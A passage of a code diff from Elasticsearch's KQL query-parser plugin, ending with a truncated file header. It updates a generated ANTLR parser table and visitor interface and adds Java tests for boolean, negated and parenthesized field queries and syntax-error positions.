"\u008c\b\u000f\u0001\u000f\u0004\u000f\u008f\b\u000f\u000b\u000f\f\u000f"+ - "\u0090\u0001\u000f\u0003\u000f\u0094\b\u000f\u0001\u000f\u0001\u000f\u0003"+ - "\u000f\u0098\b\u000f\u0001\u000f\u0001\u000f\u0003\u000f\u009c\b\u000f"+ - "\u0001\u000f\u0003\u000f\u009f\b\u000f\u0001\u0010\u0001\u0010\u0001\u0010"+ - "\u0003\u0010\u00a4\b\u0010\u0001\u0010\u0000\u0002\u0002\n\u0011\u0000"+ - "\u0002\u0004\u0006\b\n\f\u000e\u0010\u0012\u0014\u0016\u0018\u001a\u001c"+ - "\u001e \u0000\u0004\u0001\u0000\u0002\u0003\u0001\u0000\u0006\t\u0002"+ - "\u0000\u000e\u000e\u0010\u0010\u0001\u0000\u0002\u0004\u00b3\u0000#\u0001"+ - "\u0000\u0000\u0000\u0002\'\u0001\u0000\u0000\u0000\u0004:\u0001\u0000"+ - "\u0000\u0000\u0006<\u0001\u0000\u0000\u0000\b?\u0001\u0000\u0000\u0000"+ - "\nE\u0001\u0000\u0000\u0000\fW\u0001\u0000\u0000\u0000\u000eY\u0001\u0000"+ - "\u0000\u0000\u0010_\u0001\u0000\u0000\u0000\u0012c\u0001\u0000\u0000\u0000"+ - "\u0014g\u0001\u0000\u0000\u0000\u0016q\u0001\u0000\u0000\u0000\u0018s"+ - "\u0001\u0000\u0000\u0000\u001a\u0081\u0001\u0000\u0000\u0000\u001c\u0088"+ - "\u0001\u0000\u0000\u0000\u001e\u009e\u0001\u0000\u0000\u0000 \u00a3\u0001"+ - "\u0000\u0000\u0000\"$\u0003\u0002\u0001\u0000#\"\u0001\u0000\u0000\u0000"+ - "#$\u0001\u0000\u0000\u0000$%\u0001\u0000\u0000\u0000%&\u0005\u0000\u0000"+ - "\u0001&\u0001\u0001\u0000\u0000\u0000\'(\u0006\u0001\uffff\uffff\u0000"+ - "()\u0003\u0004\u0002\u0000)/\u0001\u0000\u0000\u0000*+\n\u0002\u0000\u0000"+ - "+,\u0007\u0000\u0000\u0000,.\u0003\u0002\u0001\u0002-*\u0001\u0000\u0000"+ - "\u0000.1\u0001\u0000\u0000\u0000/-\u0001\u0000\u0000\u0000/0\u0001\u0000"+ - "\u0000\u00000\u0003\u0001\u0000\u0000\u00001/\u0001\u0000\u0000\u0000"+ - "2;\u0003\u0006\u0003\u00003;\u0003\b\u0004\u00004;\u0003\u0012\t\u0000"+ - "5;\u0003\u0010\b\u00006;\u0003\u0018\f\u00007;\u0003\u0014\n\u00008;\u0003"+ - "\u001a\r\u00009;\u0003\u001c\u000e\u0000:2\u0001\u0000\u0000\u0000:3\u0001"+ - "\u0000\u0000\u0000:4\u0001\u0000\u0000\u0000:5\u0001\u0000\u0000\u0000"+ - ":6\u0001\u0000\u0000\u0000:7\u0001\u0000\u0000\u0000:8\u0001\u0000\u0000"+ - "\u0000:9\u0001\u0000\u0000\u0000;\u0005\u0001\u0000\u0000\u0000<=\u0005"+ - "\u0004\u0000\u0000=>\u0003\u0004\u0002\u0000>\u0007\u0001\u0000\u0000"+ - "\u0000?@\u0003 \u0010\u0000@A\u0005\u0005\u0000\u0000AB\u0005\f\u0000"+ - "\u0000BC\u0003\n\u0005\u0000CD\u0005\r\u0000\u0000D\t\u0001\u0000\u0000"+ - "\u0000EF\u0006\u0005\uffff\uffff\u0000FG\u0003\f\u0006\u0000GM\u0001\u0000"+ - "\u0000\u0000HI\n\u0002\u0000\u0000IJ\u0007\u0000\u0000\u0000JL\u0003\n"+ - "\u0005\u0002KH\u0001\u0000\u0000\u0000LO\u0001\u0000\u0000\u0000MK\u0001"+ - "\u0000\u0000\u0000MN\u0001\u0000\u0000\u0000N\u000b\u0001\u0000\u0000"+ - "\u0000OM\u0001\u0000\u0000\u0000PX\u0003\u0006\u0003\u0000QX\u0003\b\u0004"+ - "\u0000RX\u0003\u0010\b\u0000SX\u0003\u000e\u0007\u0000TX\u0003\u0018\f"+ - "\u0000UX\u0003\u0014\n\u0000VX\u0003\u001a\r\u0000WP\u0001\u0000\u0000"+ - "\u0000WQ\u0001\u0000\u0000\u0000WR\u0001\u0000\u0000\u0000WS\u0001\u0000"+ - "\u0000\u0000WT\u0001\u0000\u0000\u0000WU\u0001\u0000\u0000\u0000WV\u0001"+ - "\u0000\u0000\u0000X\r\u0001\u0000\u0000\u0000YZ\u0005\n\u0000\u0000Z["+ - "\u0003\n\u0005\u0000[\\\u0005\u000b\u0000\u0000\\\u000f\u0001\u0000\u0000"+ - "\u0000]^\u0005\u0010\u0000\u0000^`\u0005\u0005\u0000\u0000_]\u0001\u0000"+ - "\u0000\u0000_`\u0001\u0000\u0000\u0000`a\u0001\u0000\u0000\u0000ab\u0005"+ - "\u0010\u0000\u0000b\u0011\u0001\u0000\u0000\u0000cd\u0005\n\u0000\u0000"+ - "de\u0003\u0002\u0001\u0000ef\u0005\u000b\u0000\u0000f\u0013\u0001\u0000"+ - "\u0000\u0000gh\u0003 \u0010\u0000hi\u0007\u0001\u0000\u0000ij\u0003\u0016"+ - "\u000b\u0000j\u0015\u0001\u0000\u0000\u0000km\u0007\u0002\u0000\u0000"+ - "lk\u0001\u0000\u0000\u0000mn\u0001\u0000\u0000\u0000nl\u0001\u0000\u0000"+ - "\u0000no\u0001\u0000\u0000\u0000or\u0001\u0000\u0000\u0000pr\u0005\u000f"+ - "\u0000\u0000ql\u0001\u0000\u0000\u0000qp\u0001\u0000\u0000\u0000r\u0017"+ - "\u0001\u0000\u0000\u0000st\u0003 \u0010\u0000tu\u0005\u0005\u0000\u0000"+ - "uv\u0005\u0010\u0000\u0000v\u0019\u0001\u0000\u0000\u0000wx\u0003 \u0010"+ - "\u0000xy\u0005\u0005\u0000\u0000yz\u0003\u001e\u000f\u0000z\u0082\u0001"+ - "\u0000\u0000\u0000{|\u0003 \u0010\u0000|}\u0005\u0005\u0000\u0000}~\u0005"+ - "\n\u0000\u0000~\u007f\u0003\u001e\u000f\u0000\u007f\u0080\u0005\u000b"+ - "\u0000\u0000\u0080\u0082\u0001\u0000\u0000\u0000\u0081w\u0001\u0000\u0000"+ - "\u0000\u0081{\u0001\u0000\u0000\u0000\u0082\u001b\u0001\u0000\u0000\u0000"+ - "\u0083\u0089\u0003\u001e\u000f\u0000\u0084\u0085\u0005\n\u0000\u0000\u0085"+ - "\u0086\u0003\u001e\u000f\u0000\u0086\u0087\u0005\u000b\u0000\u0000\u0087"+ - "\u0089\u0001\u0000\u0000\u0000\u0088\u0083\u0001\u0000\u0000\u0000\u0088"+ - "\u0084\u0001\u0000\u0000\u0000\u0089\u001d\u0001\u0000\u0000\u0000\u008a"+ - "\u008c\u0007\u0003\u0000\u0000\u008b\u008a\u0001\u0000\u0000\u0000\u008b"+ - "\u008c\u0001\u0000\u0000\u0000\u008c\u008e\u0001\u0000\u0000\u0000\u008d"+ - "\u008f\u0007\u0002\u0000\u0000\u008e\u008d\u0001\u0000\u0000\u0000\u008f"+ - "\u0090\u0001\u0000\u0000\u0000\u0090\u008e\u0001\u0000\u0000\u0000\u0090"+ - "\u0091\u0001\u0000\u0000\u0000\u0091\u0093\u0001\u0000\u0000\u0000\u0092"+ - "\u0094\u0007\u0003\u0000\u0000\u0093\u0092\u0001\u0000\u0000\u0000\u0093"+ - "\u0094\u0001\u0000\u0000\u0000\u0094\u009f\u0001\u0000\u0000\u0000\u0095"+ - "\u0097\u0007\u0000\u0000\u0000\u0096\u0098\u0007\u0003\u0000\u0000\u0097"+ - "\u0096\u0001\u0000\u0000\u0000\u0097\u0098\u0001\u0000\u0000\u0000\u0098"+ - "\u009f\u0001\u0000\u0000\u0000\u0099\u009b\u0005\u0004\u0000\u0000\u009a"+ - "\u009c\u0007\u0000\u0000\u0000\u009b\u009a\u0001\u0000\u0000\u0000\u009b"+ - "\u009c\u0001\u0000\u0000\u0000\u009c\u009f\u0001\u0000\u0000\u0000\u009d"+ - "\u009f\u0005\u000f\u0000\u0000\u009e\u008b\u0001\u0000\u0000\u0000\u009e"+ - "\u0095\u0001\u0000\u0000\u0000\u009e\u0099\u0001\u0000\u0000\u0000\u009e"+ - "\u009d\u0001\u0000\u0000\u0000\u009f\u001f\u0001\u0000\u0000\u0000\u00a0"+ - "\u00a4\u0005\u000e\u0000\u0000\u00a1\u00a4\u0005\u000f\u0000\u0000\u00a2"+ - "\u00a4\u0005\u0010\u0000\u0000\u00a3\u00a0\u0001\u0000\u0000\u0000\u00a3"+ - "\u00a1\u0001\u0000\u0000\u0000\u00a3\u00a2\u0001\u0000\u0000\u0000\u00a4"+ - "!\u0001\u0000\u0000\u0000\u0011#/:MW_nq\u0081\u0088\u008b\u0090\u0093"+ - "\u0097\u009b\u009e\u00a3"; + "\u000f\u0002\u0010\u0007\u0010\u0002\u0011\u0007\u0011\u0001\u0000\u0003"+ + "\u0000&\b\u0000\u0001\u0000\u0001\u0000\u0001\u0001\u0001\u0001\u0001"+ + "\u0001\u0001\u0001\u0001\u0001\u0001\u0001\u0005\u00010\b\u0001\n\u0001"+ + "\f\u00013\t\u0001\u0001\u0002\u0001\u0002\u0001\u0002\u0001\u0002\u0001"+ + "\u0002\u0001\u0002\u0001\u0002\u0001\u0002\u0003\u0002=\b\u0002\u0001"+ + "\u0003\u0001\u0003\u0001\u0003\u0001\u0004\u0001\u0004\u0001\u0004\u0001"+ + "\u0004\u0001\u0004\u0001\u0004\u0001\u0005\u0001\u0005\u0001\u0005\u0001"+ + "\u0005\u0001\u0005\u0001\u0005\u0005\u0005N\b\u0005\n\u0005\f\u0005Q\t"+ + "\u0005\u0001\u0006\u0001\u0006\u0001\u0006\u0001\u0006\u0001\u0006\u0001"+ + "\u0006\u0001\u0006\u0003\u0006Z\b\u0006\u0001\u0007\u0001\u0007\u0001"+ + "\u0007\u0001\u0007\u0001\b\u0001\b\u0003\bb\b\b\u0001\b\u0001\b\u0001"+ + "\t\u0001\t\u0001\t\u0001\t\u0001\n\u0001\n\u0001\n\u0001\n\u0001\u000b"+ + "\u0004\u000bo\b\u000b\u000b\u000b\f\u000bp\u0001\u000b\u0003\u000bt\b"+ + "\u000b\u0001\f\u0001\f\u0001\f\u0001\f\u0001\r\u0001\r\u0001\r\u0001\r"+ + "\u0001\u000e\u0001\u000e\u0001\u000f\u0004\u000f\u0081\b\u000f\u000b\u000f"+ + "\f\u000f\u0082\u0001\u000f\u0003\u000f\u0086\b\u000f\u0001\u000f\u0004"+ + "\u000f\u0089\b\u000f\u000b\u000f\f\u000f\u008a\u0001\u000f\u0004\u000f"+ + "\u008e\b\u000f\u000b\u000f\f\u000f\u008f\u0001\u000f\u0003\u000f\u0093"+ + "\b\u000f\u0001\u000f\u0001\u000f\u0001\u000f\u0003\u000f\u0098\b\u000f"+ + "\u0001\u000f\u0001\u000f\u0001\u000f\u0001\u000f\u0003\u000f\u009e\b\u000f"+ + "\u0001\u0010\u0001\u0010\u0001\u0010\u0001\u0010\u0001\u0010\u0001\u0010"+ + "\u0003\u0010\u00a6\b\u0010\u0001\u0010\u0001\u0010\u0001\u0010\u0005\u0010"+ + "\u00ab\b\u0010\n\u0010\f\u0010\u00ae\t\u0010\u0001\u0011\u0001\u0011\u0001"+ + "\u0011\u0003\u0011\u00b3\b\u0011\u0001\u0011\u0000\u0003\u0002\n \u0012"+ + "\u0000\u0002\u0004\u0006\b\n\f\u000e\u0010\u0012\u0014\u0016\u0018\u001a"+ + "\u001c\u001e \"\u0000\u0004\u0001\u0000\u0002\u0003\u0001\u0000\u0006"+ + "\t\u0002\u0000\u000e\u000e\u0010\u0010\u0001\u0000\u0002\u0004\u00c4\u0000"+ + "%\u0001\u0000\u0000\u0000\u0002)\u0001\u0000\u0000\u0000\u0004<\u0001"+ + "\u0000\u0000\u0000\u0006>\u0001\u0000\u0000\u0000\bA\u0001\u0000\u0000"+ + "\u0000\nG\u0001\u0000\u0000\u0000\fY\u0001\u0000\u0000\u0000\u000e[\u0001"+ + "\u0000\u0000\u0000\u0010a\u0001\u0000\u0000\u0000\u0012e\u0001\u0000\u0000"+ + "\u0000\u0014i\u0001\u0000\u0000\u0000\u0016s\u0001\u0000\u0000\u0000\u0018"+ + "u\u0001\u0000\u0000\u0000\u001ay\u0001\u0000\u0000\u0000\u001c}\u0001"+ + "\u0000\u0000\u0000\u001e\u009d\u0001\u0000\u0000\u0000 \u00a5\u0001\u0000"+ + "\u0000\u0000\"\u00b2\u0001\u0000\u0000\u0000$&\u0003\u0002\u0001\u0000"+ + "%$\u0001\u0000\u0000\u0000%&\u0001\u0000\u0000\u0000&\'\u0001\u0000\u0000"+ + "\u0000\'(\u0005\u0000\u0000\u0001(\u0001\u0001\u0000\u0000\u0000)*\u0006"+ + "\u0001\uffff\uffff\u0000*+\u0003\u0004\u0002\u0000+1\u0001\u0000\u0000"+ + "\u0000,-\n\u0002\u0000\u0000-.\u0007\u0000\u0000\u0000.0\u0003\u0002\u0001"+ + "\u0002/,\u0001\u0000\u0000\u000003\u0001\u0000\u0000\u00001/\u0001\u0000"+ + "\u0000\u000012\u0001\u0000\u0000\u00002\u0003\u0001\u0000\u0000\u0000"+ + "31\u0001\u0000\u0000\u00004=\u0003\u0006\u0003\u00005=\u0003\b\u0004\u0000"+ + "6=\u0003\u0012\t\u00007=\u0003\u0010\b\u00008=\u0003\u0018\f\u00009=\u0003"+ + "\u0014\n\u0000:=\u0003\u001a\r\u0000;=\u0003\u001c\u000e\u0000<4\u0001"+ + "\u0000\u0000\u0000<5\u0001\u0000\u0000\u0000<6\u0001\u0000\u0000\u0000"+ + "<7\u0001\u0000\u0000\u0000<8\u0001\u0000\u0000\u0000<9\u0001\u0000\u0000"+ + "\u0000<:\u0001\u0000\u0000\u0000<;\u0001\u0000\u0000\u0000=\u0005\u0001"+ + "\u0000\u0000\u0000>?\u0005\u0004\u0000\u0000?@\u0003\u0004\u0002\u0000"+ + "@\u0007\u0001\u0000\u0000\u0000AB\u0003\"\u0011\u0000BC\u0005\u0005\u0000"+ + "\u0000CD\u0005\f\u0000\u0000DE\u0003\n\u0005\u0000EF\u0005\r\u0000\u0000"+ + "F\t\u0001\u0000\u0000\u0000GH\u0006\u0005\uffff\uffff\u0000HI\u0003\f"+ + "\u0006\u0000IO\u0001\u0000\u0000\u0000JK\n\u0002\u0000\u0000KL\u0007\u0000"+ + "\u0000\u0000LN\u0003\n\u0005\u0002MJ\u0001\u0000\u0000\u0000NQ\u0001\u0000"+ + "\u0000\u0000OM\u0001\u0000\u0000\u0000OP\u0001\u0000\u0000\u0000P\u000b"+ + "\u0001\u0000\u0000\u0000QO\u0001\u0000\u0000\u0000RZ\u0003\u0006\u0003"+ + "\u0000SZ\u0003\b\u0004\u0000TZ\u0003\u0010\b\u0000UZ\u0003\u000e\u0007"+ + "\u0000VZ\u0003\u0018\f\u0000WZ\u0003\u0014\n\u0000XZ\u0003\u001a\r\u0000"+ + "YR\u0001\u0000\u0000\u0000YS\u0001\u0000\u0000\u0000YT\u0001\u0000\u0000"+ + "\u0000YU\u0001\u0000\u0000\u0000YV\u0001\u0000\u0000\u0000YW\u0001\u0000"+ + "\u0000\u0000YX\u0001\u0000\u0000\u0000Z\r\u0001\u0000\u0000\u0000[\\\u0005"+ + "\n\u0000\u0000\\]\u0003\n\u0005\u0000]^\u0005\u000b\u0000\u0000^\u000f"+ + "\u0001\u0000\u0000\u0000_`\u0005\u0010\u0000\u0000`b\u0005\u0005\u0000"+ + "\u0000a_\u0001\u0000\u0000\u0000ab\u0001\u0000\u0000\u0000bc\u0001\u0000"+ + "\u0000\u0000cd\u0005\u0010\u0000\u0000d\u0011\u0001\u0000\u0000\u0000"+ + "ef\u0005\n\u0000\u0000fg\u0003\u0002\u0001\u0000gh\u0005\u000b\u0000\u0000"+ + "h\u0013\u0001\u0000\u0000\u0000ij\u0003\"\u0011\u0000jk\u0007\u0001\u0000"+ + "\u0000kl\u0003\u0016\u000b\u0000l\u0015\u0001\u0000\u0000\u0000mo\u0007"+ + "\u0002\u0000\u0000nm\u0001\u0000\u0000\u0000op\u0001\u0000\u0000\u0000"+ + "pn\u0001\u0000\u0000\u0000pq\u0001\u0000\u0000\u0000qt\u0001\u0000\u0000"+ + "\u0000rt\u0005\u000f\u0000\u0000sn\u0001\u0000\u0000\u0000sr\u0001\u0000"+ + "\u0000\u0000t\u0017\u0001\u0000\u0000\u0000uv\u0003\"\u0011\u0000vw\u0005"+ + "\u0005\u0000\u0000wx\u0005\u0010\u0000\u0000x\u0019\u0001\u0000\u0000"+ + "\u0000yz\u0003\"\u0011\u0000z{\u0005\u0005\u0000\u0000{|\u0003\u001e\u000f"+ + "\u0000|\u001b\u0001\u0000\u0000\u0000}~\u0003\u001e\u000f\u0000~\u001d"+ + "\u0001\u0000\u0000\u0000\u007f\u0081\u0007\u0002\u0000\u0000\u0080\u007f"+ + "\u0001\u0000\u0000\u0000\u0081\u0082\u0001\u0000\u0000\u0000\u0082\u0080"+ + "\u0001\u0000\u0000\u0000\u0082\u0083\u0001\u0000\u0000\u0000\u0083\u009e"+ + "\u0001\u0000\u0000\u0000\u0084\u0086\u0007\u0002\u0000\u0000\u0085\u0084"+ + "\u0001\u0000\u0000\u0000\u0085\u0086\u0001\u0000\u0000\u0000\u0086\u0088"+ + "\u0001\u0000\u0000\u0000\u0087\u0089\u0007\u0003\u0000\u0000\u0088\u0087"+ + "\u0001\u0000\u0000\u0000\u0089\u008a\u0001\u0000\u0000\u0000\u008a\u0088"+ + "\u0001\u0000\u0000\u0000\u008a\u008b\u0001\u0000\u0000\u0000\u008b\u009e"+ + "\u0001\u0000\u0000\u0000\u008c\u008e\u0007\u0000\u0000\u0000\u008d\u008c"+ + "\u0001\u0000\u0000\u0000\u008e\u008f\u0001\u0000\u0000\u0000\u008f\u008d"+ + "\u0001\u0000\u0000\u0000\u008f\u0090\u0001\u0000\u0000\u0000\u0090\u0092"+ + "\u0001\u0000\u0000\u0000\u0091\u0093\u0007\u0002\u0000\u0000\u0092\u0091"+ + "\u0001\u0000\u0000\u0000\u0092\u0093\u0001\u0000\u0000\u0000\u0093\u009e"+ + "\u0001\u0000\u0000\u0000\u0094\u009e\u0005\u000f\u0000\u0000\u0095\u0097"+ + "\u0005\u0004\u0000\u0000\u0096\u0098\u0003\u001e\u000f\u0000\u0097\u0096"+ + "\u0001\u0000\u0000\u0000\u0097\u0098\u0001\u0000\u0000\u0000\u0098\u009e"+ + "\u0001\u0000\u0000\u0000\u0099\u009a\u0005\n\u0000\u0000\u009a\u009b\u0003"+ + " \u0010\u0000\u009b\u009c\u0005\u000b\u0000\u0000\u009c\u009e\u0001\u0000"+ + "\u0000\u0000\u009d\u0080\u0001\u0000\u0000\u0000\u009d\u0085\u0001\u0000"+ + "\u0000\u0000\u009d\u008d\u0001\u0000\u0000\u0000\u009d\u0094\u0001\u0000"+ + "\u0000\u0000\u009d\u0095\u0001\u0000\u0000\u0000\u009d\u0099\u0001\u0000"+ + "\u0000\u0000\u009e\u001f\u0001\u0000\u0000\u0000\u009f\u00a0\u0006\u0010"+ + "\uffff\uffff\u0000\u00a0\u00a1\u0005\n\u0000\u0000\u00a1\u00a2\u0003 "+ + "\u0010\u0000\u00a2\u00a3\u0005\u000b\u0000\u0000\u00a3\u00a6\u0001\u0000"+ + "\u0000\u0000\u00a4\u00a6\u0003\u001e\u000f\u0000\u00a5\u009f\u0001\u0000"+ + "\u0000\u0000\u00a5\u00a4\u0001\u0000\u0000\u0000\u00a6\u00ac\u0001\u0000"+ + "\u0000\u0000\u00a7\u00a8\n\u0003\u0000\u0000\u00a8\u00a9\u0007\u0000\u0000"+ + "\u0000\u00a9\u00ab\u0003\u001e\u000f\u0000\u00aa\u00a7\u0001\u0000\u0000"+ + "\u0000\u00ab\u00ae\u0001\u0000\u0000\u0000\u00ac\u00aa\u0001\u0000\u0000"+ + "\u0000\u00ac\u00ad\u0001\u0000\u0000\u0000\u00ad!\u0001\u0000\u0000\u0000"+ + "\u00ae\u00ac\u0001\u0000\u0000\u0000\u00af\u00b3\u0005\u000e\u0000\u0000"+ + "\u00b0\u00b3\u0005\u000f\u0000\u0000\u00b1\u00b3\u0005\u0010\u0000\u0000"+ + "\u00b2\u00af\u0001\u0000\u0000\u0000\u00b2\u00b0\u0001\u0000\u0000\u0000"+ + "\u00b2\u00b1\u0001\u0000\u0000\u0000\u00b3#\u0001\u0000\u0000\u0000\u0012"+ + "%1 extends ParseTreeVisitor { * @return the visitor result */ T visitFieldQueryValue(KqlBaseParser.FieldQueryValueContext ctx); + /** + * Visit a parse tree produced by {@link KqlBaseParser#booleanFieldQueryValue}. + * @param ctx the parse tree + * @return the visitor result + */ + T visitBooleanFieldQueryValue(KqlBaseParser.BooleanFieldQueryValueContext ctx); /** * Visit a parse tree produced by {@link KqlBaseParser#fieldName}. * @param ctx the parse tree diff --git a/x-pack/plugin/kql/src/test/java/org/elasticsearch/xpack/kql/parser/KqlParserFieldQueryTests.java b/x-pack/plugin/kql/src/test/java/org/elasticsearch/xpack/kql/parser/KqlParserFieldQueryTests.java index 95814ee265745..3aa6283fe9b6f 100644 --- a/x-pack/plugin/kql/src/test/java/org/elasticsearch/xpack/kql/parser/KqlParserFieldQueryTests.java +++ b/x-pack/plugin/kql/src/test/java/org/elasticsearch/xpack/kql/parser/KqlParserFieldQueryTests.java @@ -10,8 +10,10 @@ import org.elasticsearch.core.Strings; import org.elasticsearch.index.query.BoolQueryBuilder; import org.elasticsearch.index.query.MatchNoneQueryBuilder; +import org.elasticsearch.index.query.QueryBuilder; import java.util.List; +import java.util.function.Consumer; import static org.hamcrest.Matchers.containsInAnyOrder; import static org.hamcrest.Matchers.empty; @@ -77,7 +79,10 @@ public void testParseUnquotedLiteralKeywordFieldQuery() { // Leading operators (AND, OR) are terms of the match query assertTermQueryBuilder(parseKqlQuery(kqlFieldQuery(KEYWORD_FIELD_NAME, "AND bar")), KEYWORD_FIELD_NAME, "AND bar"); assertTermQueryBuilder(parseKqlQuery(kqlFieldQuery(KEYWORD_FIELD_NAME, "OR bar")), KEYWORD_FIELD_NAME, "OR bar"); - assertTermQueryBuilder(parseKqlQuery(kqlFieldQuery(KEYWORD_FIELD_NAME, "NOT bar")), KEYWORD_FIELD_NAME, "NOT bar"); + assertMustNotQueryBuilder( + parseKqlQuery(kqlFieldQuery(KEYWORD_FIELD_NAME, "NOT bar")), + (subQuery) -> assertTermQueryBuilder(subQuery, KEYWORD_FIELD_NAME, "bar") + ); // Lonely operators (AND, NOT, OR) assertTermQueryBuilder(parseKqlQuery(kqlFieldQuery(KEYWORD_FIELD_NAME, "AND AND")), KEYWORD_FIELD_NAME, "AND AND"); @@ -124,6 +129,7 @@ public void testParseUnquotedLiteralMatchFieldsQuery() { // Multiple words assertMatchQueryBuilder(parseKqlQuery(kqlFieldQuery(fieldName, "foo bar")), fieldName, "foo bar"); + assertMatchQueryBuilder(parseKqlQuery(kqlFieldQuery(fieldName, "(foo bar)")), fieldName, "foo bar"); // Escaped keywords assertMatchQueryBuilder(parseKqlQuery(kqlFieldQuery(fieldName, "foo \\and bar")), fieldName, "foo and bar"); @@ -151,7 +157,10 @@ public void testParseUnquotedLiteralMatchFieldsQuery() { // Leading operators (AND, OR) are terms of the match query assertMatchQueryBuilder(parseKqlQuery(kqlFieldQuery(fieldName, "AND bar")), fieldName, "AND bar"); assertMatchQueryBuilder(parseKqlQuery(kqlFieldQuery(fieldName, "OR bar")), fieldName, "OR bar"); - assertMatchQueryBuilder(parseKqlQuery(kqlFieldQuery(fieldName, "NOT bar")), fieldName, "NOT bar"); + assertMustNotQueryBuilder( + parseKqlQuery(kqlFieldQuery(fieldName, "NOT bar")), + (subQuery) -> assertMatchQueryBuilder(subQuery, fieldName, "bar") + ); // Lonely operators (AND, NOT, OR) assertMatchQueryBuilder(parseKqlQuery(kqlFieldQuery(fieldName, "AND")), fieldName, "AND"); @@ -174,6 +183,66 @@ public void testParseUnquotedLiteralMatchFieldsQuery() { } } + private void assertMustNotQueryBuilder(QueryBuilder queryBuilder, Consumer clauseVerifier) { + BoolQueryBuilder boolQuery = asInstanceOf(BoolQueryBuilder.class, queryBuilder); + assertThat(boolQuery.must(), empty()); + assertThat(boolQuery.should(), empty()); + assertThat(boolQuery.filter(), empty()); + assertThat(boolQuery.mustNot(), hasSize(1)); + + clauseVerifier.accept(boolQuery.mustNot().get(0)); + } + + public void testBooleanFieldQueries() { + assertShouldQueryBuilder( + parseKqlQuery(kqlFieldQuery(KEYWORD_FIELD_NAME, "(foo OR bar)")), + (clause) -> assertTermQueryBuilder(clause, KEYWORD_FIELD_NAME, "foo"), + (clause) -> assertTermQueryBuilder(clause, KEYWORD_FIELD_NAME, "bar") + ); + + assertMustQueryBuilder( + parseKqlQuery(kqlFieldQuery(KEYWORD_FIELD_NAME, "(foo AND bar)")), + (clause) -> assertTermQueryBuilder(clause, KEYWORD_FIELD_NAME, "foo"), + (clause) -> assertTermQueryBuilder(clause, KEYWORD_FIELD_NAME, "bar") + ); + + assertMustQueryBuilder( + parseKqlQuery(kqlFieldQuery(KEYWORD_FIELD_NAME, "(foo or bar and baz)")), + (clause) -> assertShouldQueryBuilder( + clause, + (subClause) -> assertTermQueryBuilder(subClause, KEYWORD_FIELD_NAME, "foo"), + (subClause) -> assertTermQueryBuilder(subClause, KEYWORD_FIELD_NAME, "bar") + ), + (clause) -> assertTermQueryBuilder(clause, KEYWORD_FIELD_NAME, "baz") + ); + } + + @SafeVarargs + private final void assertShouldQueryBuilder(QueryBuilder queryBuilder, Consumer... clauseVerifiers) { + BoolQueryBuilder boolQuery = asInstanceOf(BoolQueryBuilder.class, queryBuilder); + assertThat(boolQuery.must(), empty()); + assertThat(boolQuery.filter(), empty()); + assertThat(boolQuery.mustNot(), empty()); + assertThat(boolQuery.should(), hasSize(clauseVerifiers.length)); + + for (int i = 0; i < clauseVerifiers.length; i++) { + clauseVerifiers[i].accept(boolQuery.should().get(i)); + } + } + + @SafeVarargs + private final void assertMustQueryBuilder(QueryBuilder queryBuilder, Consumer... clauseVerifiers) { + BoolQueryBuilder boolQuery = asInstanceOf(BoolQueryBuilder.class, queryBuilder); + assertThat(boolQuery.should(), empty()); + assertThat(boolQuery.filter(), empty()); + assertThat(boolQuery.mustNot(), empty()); + assertThat(boolQuery.must(), hasSize(clauseVerifiers.length)); + + for (int i = 0; i < clauseVerifiers.length; i++) { + clauseVerifiers[i].accept(boolQuery.must().get(i)); + } + } + public void testParseQuotedStringKeywordFieldQuery() { // Single word assertTermQueryBuilder(parseKqlQuery(kqlFieldQuery(KEYWORD_FIELD_NAME, quoteString("foo"))), KEYWORD_FIELD_NAME, "foo"); @@ -278,7 +347,10 @@ public void testParseWildcardKeywordFieldQuery() { // Leading operators (AND, OR) are terms of the match query assertWildcardQueryBuilder(parseKqlQuery(kqlFieldQuery(KEYWORD_FIELD_NAME, "AND fo*")), KEYWORD_FIELD_NAME, "AND fo*"); assertWildcardQueryBuilder(parseKqlQuery(kqlFieldQuery(KEYWORD_FIELD_NAME, "OR fo*")), KEYWORD_FIELD_NAME, "OR fo*"); - assertWildcardQueryBuilder(parseKqlQuery(kqlFieldQuery(KEYWORD_FIELD_NAME, "NOT fo*")), KEYWORD_FIELD_NAME, "NOT fo*"); + assertMustNotQueryBuilder( + parseKqlQuery(kqlFieldQuery(KEYWORD_FIELD_NAME, "NOT fo*")), + (subQuery) -> assertWildcardQueryBuilder(subQuery, KEYWORD_FIELD_NAME, "fo*") + ); } public void testFieldWildcardFieldQueries() { @@ -291,7 +363,6 @@ public void testFieldWildcardFieldQueries() { assertThat(parsedQuery.mustNot(), empty()); assertThat(parsedQuery.must(), empty()); assertThat(parsedQuery.filter(), empty()); - assertThat(parsedQuery.minimumShouldMatch(), equalTo("1")); assertThat(parsedQuery.should(), hasSize(searchableFields.size())); assertThat( diff --git a/x-pack/plugin/kql/src/test/java/org/elasticsearch/xpack/kql/parser/KqlParserTests.java b/x-pack/plugin/kql/src/test/java/org/elasticsearch/xpack/kql/parser/KqlParserTests.java index b9055ae166aa7..d322a76035d8a 100644 --- a/x-pack/plugin/kql/src/test/java/org/elasticsearch/xpack/kql/parser/KqlParserTests.java +++ b/x-pack/plugin/kql/src/test/java/org/elasticsearch/xpack/kql/parser/KqlParserTests.java @@ -12,6 +12,7 @@ import java.io.IOException; +import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.isA; @@ -38,11 +39,11 @@ public void testMatchAllQuery() { } public void testParenthesizedQuery() throws IOException { - for (String baseQuuery : readQueries(SUPPORTED_QUERY_FILE_PATH)) { + for (String baseQuery : readQueries(SUPPORTED_QUERY_FILE_PATH)) { // For each supported query, wrap it into parentheses and check query remains the same. // Adding random whitespaces as well and test they are ignored. - String parenthesizedQuery = wrapWithRandomWhitespaces("(") + baseQuuery + wrapWithRandomWhitespaces(")"); - assertThat(parseKqlQuery(parenthesizedQuery), equalTo(parseKqlQuery(baseQuuery))); + String parenthesizedQuery = "(" + baseQuery + ")"; + assertThat(parseKqlQuery(parenthesizedQuery), equalTo(parseKqlQuery(baseQuery))); } } @@ -80,8 +81,8 @@ public void testSyntaxErrorsHandling() { { KqlParsingException e = assertThrows(KqlParsingException.class, () -> parseKqlQuery("foo: (bar baz AND qux")); assertThat(e.getLineNumber(), equalTo(1)); - assertThat(e.getColumnNumber(), equalTo(15)); - assertThat(e.getMessage(), equalTo("line 1:15: missing ')' at 'AND'")); + assertThat(e.getColumnNumber(), equalTo(22)); + assertThat(e.getMessage(), containsString("line 1:22: missing ')' at ''")); } } } diff --git a/x-pack/plugin/kql/src/test/resources/unsupported-queries b/x-pack/plugin/kql/src/test/resources/unsupported-queries index 